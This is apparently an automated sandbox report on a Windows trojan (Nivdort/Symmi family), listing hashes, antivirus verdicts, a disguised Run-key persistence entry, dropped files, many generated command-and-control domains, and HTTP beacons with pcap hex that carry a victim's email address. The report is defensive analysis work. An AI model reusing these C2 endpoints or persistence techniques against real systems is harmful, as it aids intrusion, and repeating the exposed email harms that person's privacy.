Analysis Date2015-08-12 20:56:09
MD5d6cd64a185269790c5ac60ace1446c01
SHA190b3e7ca32ca69e1b2c635fc3222d55bf051664b

Static Details:

File typePE32 executable for MS Windows (GUI) Intel 80386 32-bit
Section.text md5: 65ab58ed39d82ca9febff77086099cff sha1: d4d7096e16368f358a92cad05399e46ac14478de size: 301568
Section.rdata md5: 27cd77fa390a50c6da8c2f031c9d5dac sha1: cbc641a1ffce01666e7fd44cc026e0b52e3afe01 size: 34304
Section.data md5: bccac870f185d3a2f1e2a81022c9afbf sha1: 6fc2a9a6e2e3bd2c095f3fe8231fdf1a3065fc2b size: 99328
Timestamp2014-10-30 09:50:11
PackerMicrosoft Visual C++ ?.?
PEhash8a061ab750afc6ee824aa218cf6c7c0316dfcef0
IMPhash6b17176fedd76d9ad4b16a4331c6ef8b
AVCA (E-Trust Ino)no_virus
AVF-SecureGen:Variant.Symmi.22722
AVDr. WebTrojan.DownLoader11.44050
AVClamAVWin.Trojan.Agent-810200
AVArcabit (arcavir)Gen:Variant.Symmi.22722
AVBullGuardGen:Variant.Symmi.22722
AVPadvishno_virus
AVVirusBlokAda (vba32)no_virus
AVCAT (quickheal)Trojan.Dynamer.AC3
AVTrend MicroTSPY_NIVDORT.SMB
AVKasperskyTrojan.Win32.Generic
AVZillya!no_virus
AVEmsisoftGen:Variant.Symmi.22722
AVIkarusTrojan.FBAccountLock
AVFrisk (f-prot)no_virus
AVAuthentiumW32/Wonton.B.gen!Eldorado
AVMalwareBytesTrojan.Zbot.WHE
AVMicroWorld (escan)Gen:Variant.Symmi.22722
AVMicrosoft Security EssentialsTrojanSpy:Win32/Nivdort.BD
AVK7Trojan ( 004cb2771 )
AVBitDefenderGen:Variant.Symmi.22722
AVFortinetW32/Agent.VNC!tr
AVSymantecDownloader.Upatre!g15
AVGrisoft (avg)Win32/Cryptor
AVEset (nod32)Win32/Agent.VNC
AVAlwil (avast)Downloader-TLD [Trj]
AVAd-AwareGen:Variant.Symmi.22722
AVTwisterTrojan.Generic.zndj
AVAvira (antivir)TR/ATRAPS.Gen2
AVMcafeeTrojan-FEMT!D6CD64A18526
AVRisingno_virus

Runtime Details:

Screenshot

Process
↳ C:\malware.exe

RegistryHKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\PC Credential Authentication ➝
C:\Documents and Settings\Administrator\Application Data\uxxfmuchrs\wvwpixisdxan.exe
Creates FileC:\Documents and Settings\Administrator\Application Data\uxxfmuchrs\wvwpixisdxan.exe
Creates ProcessC:\Documents and Settings\Administrator\Application Data\uxxfmuchrs\wvwpixisdxan.exe

Process
↳ C:\Documents and Settings\Administrator\Application Data\uxxfmuchrs\wvwpixisdxan.exe

Creates FileC:\Documents and Settings\Administrator\Application Data\uxxfmuchrs\ylnilnkqahj.exe
Creates FileC:\Documents and Settings\Administrator\Application Data\uxxfmuchrs\wvwpixisdxan.zvstn
Creates File\Device\Afd\Endpoint
Creates ProcessWATCHDOGPROC "C:\Documents and Settings\Administrator\Application Data\uxxfmuchrs\wvwpixisdxan.exe"

Process
↳ WATCHDOGPROC "C:\Documents and Settings\Administrator\Application Data\uxxfmuchrs\wvwpixisdxan.exe"

Network Details:

DNSmachinecontrol.net
Type: A
63.247.142.64
DNSforeigncontrol.net
Type: A
195.22.26.254
DNSforeigncontrol.net
Type: A
195.22.26.231
DNSforeigncontrol.net
Type: A
195.22.26.252
DNSforeigncontrol.net
Type: A
195.22.26.253
DNSchildrenmatter.net
Type: A
162.144.16.48
DNSfamilytogether.net
Type: A
104.219.41.65
DNSchildrencontrol.net
Type: A
95.211.230.75
DNSbecausespent.net
Type: A
DNSexpecttogether.net
Type: A
DNSbecausetogether.net
Type: A
DNSexpectcontrol.net
Type: A
DNSbecausecontrol.net
Type: A
DNSpersonmatter.net
Type: A
DNSmachinematter.net
Type: A
DNSpersonspent.net
Type: A
DNSmachinespent.net
Type: A
DNSpersontogether.net
Type: A
DNSmachinetogether.net
Type: A
DNSpersoncontrol.net
Type: A
DNSsuddenmatter.net
Type: A
DNSforeignmatter.net
Type: A
DNSsuddenspent.net
Type: A
DNSforeignspent.net
Type: A
DNSsuddentogether.net
Type: A
DNSforeigntogether.net
Type: A
DNSsuddencontrol.net
Type: A
DNSwhethermatter.net
Type: A
DNSrightmatter.net
Type: A
DNSwhetherspent.net
Type: A
DNSrightspent.net
Type: A
DNSwhethertogether.net
Type: A
DNSrighttogether.net
Type: A
DNSwhethercontrol.net
Type: A
DNSrightcontrol.net
Type: A
DNSfigurematter.net
Type: A
DNSthoughmatter.net
Type: A
DNSfigurespent.net
Type: A
DNSthoughspent.net
Type: A
DNSfiguretogether.net
Type: A
DNSthoughtogether.net
Type: A
DNSfigurecontrol.net
Type: A
DNSthoughcontrol.net
Type: A
DNSpicturematter.net
Type: A
DNScigarettematter.net
Type: A
DNSpicturespent.net
Type: A
DNScigarettespent.net
Type: A
DNSpicturetogether.net
Type: A
DNScigarettetogether.net
Type: A
DNSpicturecontrol.net
Type: A
DNScigarettecontrol.net
Type: A
DNSfamilymatter.net
Type: A
DNSchildrenspent.net
Type: A
DNSfamilyspent.net
Type: A
DNSchildrentogether.net
Type: A
DNSfamilycontrol.net
Type: A
DNSeithermatter.net
Type: A
DNSenglishmatter.net
Type: A
DNSeitherspent.net
Type: A
DNSenglishspent.net
Type: A
DNSeithertogether.net
Type: A
DNSenglishtogether.net
Type: A
DNSeithercontrol.net
Type: A
DNSenglishcontrol.net
Type: A
DNSexpectfather.net
Type: A
DNSbecausefather.net
Type: A
DNSexpectapple.net
Type: A
DNSbecauseapple.net
Type: A
DNSexpectbuilt.net
Type: A
DNSbecausebuilt.net
Type: A
DNSexpectcarry.net
Type: A
DNSbecausecarry.net
Type: A
DNSpersonfather.net
Type: A
DNSmachinefather.net
Type: A
DNSpersonapple.net
Type: A
DNSmachineapple.net
Type: A
DNSpersonbuilt.net
Type: A
DNSmachinebuilt.net
Type: A
DNSpersoncarry.net
Type: A
DNSmachinecarry.net
Type: A
DNSsuddenfather.net
Type: A
DNSforeignfather.net
Type: A
DNSsuddenapple.net
Type: A
DNSforeignapple.net
Type: A
DNSsuddenbuilt.net
Type: A
DNSforeignbuilt.net
Type: A
DNSsuddencarry.net
Type: A
DNSforeigncarry.net
Type: A
HTTP GEThttp://machinecontrol.net/index.php?email=liana1_popescu@yahoo.com&method=post&len
User-Agent:
HTTP GEThttp://foreigncontrol.net/index.php?email=liana1_popescu@yahoo.com&method=post&len
User-Agent:
HTTP GEThttp://childrenmatter.net/index.php?email=liana1_popescu@yahoo.com&method=post&len
User-Agent:
HTTP GEThttp://familytogether.net/index.php?email=liana1_popescu@yahoo.com&method=post&len
User-Agent:
HTTP GEThttp://childrencontrol.net/index.php?email=liana1_popescu@yahoo.com&method=post&len
User-Agent:
Flows TCP192.168.1.1:1031 ➝ 63.247.142.64:80
Flows TCP192.168.1.1:1032 ➝ 195.22.26.254:80
Flows TCP192.168.1.1:1033 ➝ 162.144.16.48:80
Flows TCP192.168.1.1:1034 ➝ 104.219.41.65:80
Flows TCP192.168.1.1:1035 ➝ 95.211.230.75:80

Raw Pcap
0x00000000 (00000)   47455420 2f696e64 65782e70 68703f65   GET /index.php?e
0x00000010 (00016)   6d61696c 3d6c6961 6e61315f 706f7065   mail=liana1_pope
0x00000020 (00032)   73637540 7961686f 6f2e636f 6d266d65   scu@yahoo.com&me
0x00000030 (00048)   74686f64 3d706f73 74266c65 6e204854   thod=post&len HT
0x00000040 (00064)   54502f31 2e300d0a 41636365 70743a20   TP/1.0..Accept: 
0x00000050 (00080)   2a2f2a0d 0a436f6e 6e656374 696f6e3a   */*..Connection:
0x00000060 (00096)   20636c6f 73650d0a 486f7374 3a206d61    close..Host: ma
0x00000070 (00112)   6368696e 65636f6e 74726f6c 2e6e6574   chinecontrol.net
0x00000080 (00128)   0d0a0d0a                              ....

0x00000000 (00000)   47455420 2f696e64 65782e70 68703f65   GET /index.php?e
0x00000010 (00016)   6d61696c 3d6c6961 6e61315f 706f7065   mail=liana1_pope
0x00000020 (00032)   73637540 7961686f 6f2e636f 6d266d65   scu@yahoo.com&me
0x00000030 (00048)   74686f64 3d706f73 74266c65 6e204854   thod=post&len HT
0x00000040 (00064)   54502f31 2e300d0a 41636365 70743a20   TP/1.0..Accept: 
0x00000050 (00080)   2a2f2a0d 0a436f6e 6e656374 696f6e3a   */*..Connection:
0x00000060 (00096)   20636c6f 73650d0a 486f7374 3a20666f    close..Host: fo
0x00000070 (00112)   72656967 6e636f6e 74726f6c 2e6e6574   reigncontrol.net
0x00000080 (00128)   0d0a0d0a                              ....

0x00000000 (00000)   47455420 2f696e64 65782e70 68703f65   GET /index.php?e
0x00000010 (00016)   6d61696c 3d6c6961 6e61315f 706f7065   mail=liana1_pope
0x00000020 (00032)   73637540 7961686f 6f2e636f 6d266d65   scu@yahoo.com&me
0x00000030 (00048)   74686f64 3d706f73 74266c65 6e204854   thod=post&len HT
0x00000040 (00064)   54502f31 2e300d0a 41636365 70743a20   TP/1.0..Accept: 
0x00000050 (00080)   2a2f2a0d 0a436f6e 6e656374 696f6e3a   */*..Connection:
0x00000060 (00096)   20636c6f 73650d0a 486f7374 3a206368    close..Host: ch
0x00000070 (00112)   696c6472 656e6d61 74746572 2e6e6574   ildrenmatter.net
0x00000080 (00128)   0d0a0d0a                              ....

0x00000000 (00000)   47455420 2f696e64 65782e70 68703f65   GET /index.php?e
0x00000010 (00016)   6d61696c 3d6c6961 6e61315f 706f7065   mail=liana1_pope
0x00000020 (00032)   73637540 7961686f 6f2e636f 6d266d65   scu@yahoo.com&me
0x00000030 (00048)   74686f64 3d706f73 74266c65 6e204854   thod=post&len HT
0x00000040 (00064)   54502f31 2e300d0a 41636365 70743a20   TP/1.0..Accept: 
0x00000050 (00080)   2a2f2a0d 0a436f6e 6e656374 696f6e3a   */*..Connection:
0x00000060 (00096)   20636c6f 73650d0a 486f7374 3a206661    close..Host: fa
0x00000070 (00112)   6d696c79 746f6765 74686572 2e6e6574   milytogether.net
0x00000080 (00128)   0d0a0d0a                              ....

0x00000000 (00000)   47455420 2f696e64 65782e70 68703f65   GET /index.php?e
0x00000010 (00016)   6d61696c 3d6c6961 6e61315f 706f7065   mail=liana1_pope
0x00000020 (00032)   73637540 7961686f 6f2e636f 6d266d65   scu@yahoo.com&me
0x00000030 (00048)   74686f64 3d706f73 74266c65 6e204854   thod=post&len HT
0x00000040 (00064)   54502f31 2e300d0a 41636365 70743a20   TP/1.0..Accept: 
0x00000050 (00080)   2a2f2a0d 0a436f6e 6e656374 696f6e3a   */*..Connection:
0x00000060 (00096)   20636c6f 73650d0a 486f7374 3a206368    close..Host: ch
0x00000070 (00112)   696c6472 656e636f 6e74726f 6c2e6e65   ildrencontrol.ne
0x00000080 (00128)   740d0a0d 0a                           t....


Strings